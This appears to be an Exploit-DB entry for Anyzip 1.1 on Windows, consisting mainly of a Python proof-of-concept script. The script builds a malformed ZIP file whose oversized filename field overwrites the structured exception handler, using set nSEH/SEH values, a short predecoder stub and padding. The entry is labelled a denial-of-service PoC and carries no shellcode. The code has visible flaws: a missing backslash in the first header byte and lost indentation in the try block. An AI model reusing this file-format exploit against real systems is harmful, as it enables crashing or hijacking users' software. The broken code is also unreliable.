Anyzip 1.1 - '.zip' (PoC) (SEH)

EDB-ID:

12104

CVE:

N/A

Author:

ITSecTeam

Type:

dos

Platform:

Windows

Published:

2010-04-07

#! /usr/bin/python

# Anyzip (.zip) 0day Poc (SEH)

# Homepage : www.tbsoftinc.com
# Download : www.tbsoftinc.com/download/anyzip.exe
# Version : 1.1
# Tested Os : Windows XP SP1/SP3 EN
# Usage : Python anyzip.py
# Credit : ItSecTeam
# mail : Bug@ItSecTeam.com
# Web : WwW.ITSecTeam.com
# Forum : WwW.forum.itsecteam.com

header_1 =("x50\x4B\x03\x04\x14\x00\x00"
"\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00")
header_2 = ("\x50\x4B\x01\x02\x14\x00\x14"
"\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe4\x0f"
"\x00\x00\x00\x00\x00\x00\x01\x00"
"\x24\x00\x00\x00\x00\x00\x00\x00")
header_3 = ("\x50\x4B\x05\x06\x00\x00\x00"
"\x00\x01\x00\x01\x00"
"\x12\x10\x00\x00"
"\x02\x10\x00\x00"
"\x00\x00")
nseh="\x41\x41\x41\x41"
seh="\x65\x47\x7e\x6d"
payload = "A" * 297 + nseh + seh
predecoder = "\x59\x59\x59\x51\x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" * (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
try:
f=open("anyzip-poc.zip",'w')
f.write(exploit)
f.close()
print "[+] File created successfully !"
except:
print "[-] Error cant write file to system\n"